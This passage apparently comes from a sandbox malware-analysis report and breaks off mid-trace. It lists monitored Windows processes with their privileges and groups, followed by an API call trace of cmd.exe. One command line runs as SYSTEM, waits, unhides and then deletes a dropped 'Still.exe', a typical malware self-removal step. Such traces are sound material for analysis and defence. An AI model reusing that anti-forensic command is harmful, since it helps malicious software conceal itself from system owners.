os_tid = 0x1008 Thread: id = 516 os_tid = 0x1050 Thread: id = 517 os_tid = 0xac8 Thread: id = 520 os_tid = 0xf90 Thread: id = 521 os_tid = 0xdb4 Thread: id = 522 os_tid = 0xf88 Thread: id = 599 os_tid = 0xba0 Process: id = "34" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1a4e8000" os_pid = "0x101c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0xf18" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 524 os_tid = 0x1030 Thread: id = 531 os_tid = 0x1188 Thread: id = 535 os_tid = 0x11d4 Thread: id = 537 os_tid = 0x1344 Thread: id = 539 os_tid = 0x1114 Process: id = "35" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0x64ad9000" os_pid = "0xf9c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x3ac" cmd_line = "taskhostw.exe -RegisterDevice -SettingChange -Full" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 530 os_tid = 0x138c Thread: id = 536 os_tid = 0x116c Thread: id = 553 os_tid = 0x378 Thread: id = 564 os_tid = 0xa10 Thread: id = 573 os_tid = 0x520 Thread: id = 574 os_tid = 0xd58 Thread: id = 594 os_tid = 0xa6c Process: id = "36" image_name = "mpcmdrun.exe" filename = "c:\\program files\\windows defender\\mpcmdrun.exe" page_root = "0x24ee3000" os_pid = "0x1128" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x3d8" cmd_line = "\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wdenable" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Dhcp" [0xe], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\RmSvc" [0xa], "NT SERVICE\\TimeBrokerSvc" [0xe], "NT SERVICE\\TimeBroker" [0xe], "NT SERVICE\\vmictimesync" [0xa], "S-1-5-80-1495648203-2503502111-1597754693-3445174711-1316708627" [0xa], "NT SERVICE\\wscsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000a38e" [0xc000000f], "LOCAL" [0x7] Thread: id = 538 os_tid = 0x115c Thread: id = 545 os_tid = 0xff0 Thread: id = 546 os_tid = 0x764 Thread: id = 547 os_tid = 0x12c0 Thread: id = 548 os_tid = 0x12c4 Thread: id = 549 os_tid = 0x4b0 Thread: id = 550 os_tid = 0x480 Process: id = "37" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x24f25000" os_pid = "0x13f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1128" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Dhcp" [0xe], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\RmSvc" [0xa], "NT SERVICE\\TimeBrokerSvc" [0xe], "NT SERVICE\\TimeBroker" [0xe], "NT SERVICE\\vmictimesync" [0xa], "S-1-5-80-1495648203-2503502111-1597754693-3445174711-1316708627" [0xa], "NT SERVICE\\wscsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000a38e" [0xc000000f], "LOCAL" [0x7] Thread: id = 540 os_tid = 0x13fc Thread: id = 541 os_tid = 0x13e8 Thread: id = 542 os_tid = 0xfc0 Thread: id = 543 os_tid = 0xfdc Thread: id = 544 os_tid = 0x13a8 Process: id = "38" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x334e5000" os_pid = "0xd10" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 557 os_tid = 0xd0c Thread: id = 558 os_tid = 0x97c Thread: id = 559 os_tid = 0x1310 Thread: id = 560 os_tid = 0x13a4 Thread: id = 561 os_tid = 0x13a0 Thread: id = 562 os_tid = 0x1338 Thread: id = 563 os_tid = 0x50c Thread: id = 565 os_tid = 0x778 Process: id = "39" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x20049000" os_pid = "0x13c4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xec4" cmd_line = "cmd /c choice /t 10 /d y & attrib -h \"C:\\WINDOWS\\SysWOW64\\Still.exe\" & del \"C:\\WINDOWS\\SysWOW64\\Still.exe\"" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 566 os_tid = 0x13d0 [0245.242] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0245.242] __set_app_type (_Type=0x1) [0245.243] __p__fmode () returned 0x776f3c14 [0245.243] __p__commode () returned 0x776f49ec [0245.243] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xaa6fd0) returned 0x0 [0245.243] __getmainargs (in: _Argc=0xabd1a4, _Argv=0xabd1a8, _Env=0xabd1ac, _DoWildCard=0, _StartInfo=0xabd1b8 | out: _Argc=0xabd1a4, _Argv=0xabd1a8, _Env=0xabd1ac) returned 0 [0245.243] _onexit (_Func=0xaa8030) returned 0xaa8030 [0245.243] _onexit (_Func=0xaa8040) returned 0xaa8040 [0245.243] _onexit (_Func=0xaa8050) returned 0xaa8050 [0245.244] _onexit (_Func=0xaa8060) returned 0xaa8060 [0245.244] _onexit (_Func=0xaa8070) returned 0xaa8070 [0245.246] _onexit (_Func=0xaa8080) returned 0xaa8080 [0245.246] GetCurrentThreadId () returned 0x13d0 [0245.246] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x13d0) returned 0xbc [0245.246] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0245.246] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadUILanguage") returned 0x772e4f70 [0245.246] SetThreadUILanguage (LangId=0x0) returned 0x2cb0409 [0245.766] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0245.766] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2effdf8 | out: phkResult=0x2effdf8*=0x0) returned 0x2 [0245.766] VirtualQuery (in: lpAddress=0x2effe03, lpBuffer=0x2effdb0, dwLength=0x1c | out: lpBuffer=0x2effdb0*(BaseAddress=0x2eff000, AllocationBase=0x2e00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0245.766] VirtualQuery (in: lpAddress=0x2e00000, lpBuffer=0x2effdb0, dwLength=0x1c | out: lpBuffer=0x2effdb0*(BaseAddress=0x2e00000, AllocationBase=0x2e00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0245.766] VirtualQuery (in: lpAddress=0x2e01000, lpBuffer=0x2effdb0, dwLength=0x1c | out: lpBuffer=0x2effdb0*(BaseAddress=0x2e01000, AllocationBase=0x2e00000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0245.766] VirtualQuery (in: lpAddress=0x2e03000, lpBuffer=0x2effdb0, dwLength=0x1c | out: lpBuffer=0x2effdb0*(BaseAddress=0x2e03000, AllocationBase=0x2e00000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0245.766] VirtualQuery (in: lpAddress=0x2f00000, lpBuffer=0x2effdb0, dwLength=0x1c | out: lpBuffer=0x2effdb0*(BaseAddress=0x2f00000, AllocationBase=0x2f00000, AllocationProtect=0x2, RegionSize=0xc5000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0245.766] GetConsoleOutputCP () returned 0x1b5 [0246.006] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac3850 | out: lpCPInfo=0xac3850) returned 1 [0246.006] SetConsoleCtrlHandler (HandlerRoutine=0xab7260, Add=1) returned 1 [0246.006] _get_osfhandle (_FileHandle=1) returned 0x90 [0246.006] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xac388c | out: lpMode=0xac388c) returned 1 [0246.185] _get_osfhandle (_FileHandle=0) returned 0x8c [0246.185] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xac3888 | out: lpMode=0xac3888) returned 1 [0246.372] _get_osfhandle (_FileHandle=1) returned 0x90 [0246.372] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0246.811] _get_osfhandle (_FileHandle=1) returned 0x90 [0246.811] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xac3890 | out: lpMode=0xac3890) returned 1 [0247.170] _get_osfhandle (_FileHandle=1) returned 0x90 [0247.170] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0247.420] _get_osfhandle (_FileHandle=0) returned 0x8c [0247.420] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xac3894 | out: lpMode=0xac3894) returned 1 [0247.864] _get_osfhandle (_FileHandle=0) returned 0x8c [0247.864] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x187) returned 1 [0247.978] GetEnvironmentStringsW () returned 0x3144b28* [0247.978] GetProcessHeap () returned 0x3140000 [0247.978] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xa56) returned 0x3145588 [0247.978] FreeEnvironmentStringsA (penv="A") returned 1 [0247.978] GetProcessHeap () returned 0x3140000 [0247.978] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x4) returned 0x3144608 [0247.978] GetEnvironmentStringsW () returned 0x3144b28* [0247.978] GetProcessHeap () returned 0x3140000 [0247.978] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xa56) returned 0x3145fe8 [0247.979] FreeEnvironmentStringsA (penv="A") returned 1 [0247.979] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2efed54 | out: phkResult=0x2efed54*=0xcc) returned 0x0 [0247.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x0, lpData=0x2efed60*=0x70, lpcbData=0x2efed58*=0x1000) returned 0x2 [0247.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x4, lpData=0x2efed60*=0x1, lpcbData=0x2efed58*=0x4) returned 0x0 [0247.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x0, lpData=0x2efed60*=0x1, lpcbData=0x2efed58*=0x1000) returned 0x2 [0247.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x4, lpData=0x2efed60*=0x0, lpcbData=0x2efed58*=0x4) returned 0x0 [0247.979] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x4, lpData=0x2efed60*=0x40, lpcbData=0x2efed58*=0x4) returned 0x0 [0247.980] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x4, lpData=0x2efed60*=0x40, lpcbData=0x2efed58*=0x4) returned 0x0 [0247.980] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x0, lpData=0x2efed60*=0x40, lpcbData=0x2efed58*=0x1000) returned 0x2 [0247.980] RegCloseKey (hKey=0xcc) returned 0x0 [0247.980] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2efed54 | out: phkResult=0x2efed54*=0xcc) returned 0x0 [0247.980] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x0, lpData=0x2efed60*=0x40, lpcbData=0x2efed58*=0x1000) returned 0x2 [0247.980] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x4, lpData=0x2efed60*=0x1, lpcbData=0x2efed58*=0x4) returned 0x0 [0247.980] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x0, lpData=0x2efed60*=0x1, lpcbData=0x2efed58*=0x1000) returned 0x2 [0247.980] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x4, lpData=0x2efed60*=0x0, lpcbData=0x2efed58*=0x4) returned 0x0 [0247.980] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x4, lpData=0x2efed60*=0x9, lpcbData=0x2efed58*=0x4) returned 0x0 [0247.980] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x4, lpData=0x2efed60*=0x9, lpcbData=0x2efed58*=0x4) returned 0x0 [0247.980] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2efed5c, lpData=0x2efed60, lpcbData=0x2efed58*=0x1000 | out: lpType=0x2efed5c*=0x0, lpData=0x2efed60*=0x9, lpcbData=0x2efed58*=0x1000) returned 0x2 [0247.980] RegCloseKey (hKey=0xcc) returned 0x0 [0247.981] time (in: timer=0x0 | out: timer=0x0) returned 0x5ed59c30 [0247.981] srand (_Seed=0x5ed59c30) [0247.981] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\WINDOWS\\SysWOW64\\Still.exe\" & del \"C:\\WINDOWS\\SysWOW64\\Still.exe\"" [0247.981] malloc (_Size=0x4000) returned 0x3382170 [0247.981] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\WINDOWS\\SysWOW64\\Still.exe\" & del \"C:\\WINDOWS\\SysWOW64\\Still.exe\"" [0247.982] malloc (_Size=0xffce) returned 0x3240048 [0247.982] ??_V@YAXPAX@Z () returned 0x2effd38 [0247.985] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3240048 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0248.006] malloc (_Size=0xffce) returned 0x3250020 [0248.007] ??_V@YAXPAX@Z () returned 0x2effb0c [0248.007] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3250020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0248.008] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xd4 [0248.008] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0248.008] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0248.008] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0248.008] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0248.008] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0248.008] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0248.008] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0248.008] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0248.008] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0248.008] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0248.009] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0248.009] GetProcessHeap () returned 0x3140000 [0248.009] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3145588) returned 1 [0248.009] GetEnvironmentStringsW () returned 0x31474c0* [0248.009] GetProcessHeap () returned 0x3140000 [0248.009] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xa6e) returned 0x3144b28 [0248.009] FreeEnvironmentStringsA (penv="A") returned 1 [0248.009] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0248.009] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0248.009] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0248.009] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0248.009] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0248.009] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0248.009] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0248.010] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0248.010] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0248.010] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0248.010] malloc (_Size=0xffce) returned 0x325fff8 [0248.010] ??_V@YAXPAX@Z () returned 0x2eff8a4 [0248.011] GetProcessHeap () returned 0x3140000 [0248.011] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x30) returned 0x31455a0 [0248.011] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x325fff8 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0248.011] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x7fe7, lpBuffer=0x325fff8, lpFilePart=0x2eff8f0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x2eff8f0*="system32") returned 0x13 [0248.012] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0248.012] FindFirstFileW (in: lpFileName="C:\\WINDOWS", lpFindFileData=0x2eff670 | out: lpFindFileData=0x2eff670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x31455d8 [0248.012] FindClose (in: hFindFile=0x31455d8 | out: hFindFile=0x31455d8) returned 1 [0248.012] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x2eff670 | out: lpFindFileData=0x2eff670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc0b701ad, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xc0b701ad, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x31455d8 [0248.013] FindClose (in: hFindFile=0x31455d8 | out: hFindFile=0x31455d8) returned 1 [0248.013] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0248.013] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0248.013] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0248.013] GetProcessHeap () returned 0x3140000 [0248.013] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x3144b28) returned 1 [0248.013] GetEnvironmentStringsW () returned 0x3147f68* [0248.014] GetProcessHeap () returned 0x3140000 [0248.014] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xa9e) returned 0x3148a10 [0248.014] FreeEnvironmentStringsA (penv="=") returned 1 [0248.014] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x3240048 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0248.015] GetProcessHeap () returned 0x3140000 [0248.015] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x31455a0) returned 1 [0248.015] ??_V@YAXPAX@Z () returned 0x1 [0248.015] ??_V@YAXPAX@Z () returned 0x1 [0248.015] GetProcessHeap () returned 0x3140000 [0248.015] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0x400e) returned 0x31494b8 [0248.016] GetProcessHeap () returned 0x3140000 [0248.016] RtlAllocateHeap (HeapHandle=0x3140000, Flags=0x8, Size=0xd4) returned 0x3140ae0 [0248.016] GetProcessHeap () returned 0x3140000 [0248.016] RtlFreeHeap (HeapHandle=0x3140000, Flags=0x0, BaseAddress=0x31494b8) returned 1 [0248.016] GetConsoleOutputCP () returned 0x1b5 [0248.036] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac3850 | out: lpCPInfo=0xac3850) returned 1 [0248.036] GetUserDefaultLCID () returned 0x409 [0248.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xabf82c, cchData=8 | out: lpLCData=":") returned 2 [0248.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2effc60, cchData=128 | out: lpLCData="0") returned 2 [0248.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2effc60, cchData=128 | out: lpLCData="0") returned 2 [0248.038] GetLocaleInfoW (in: 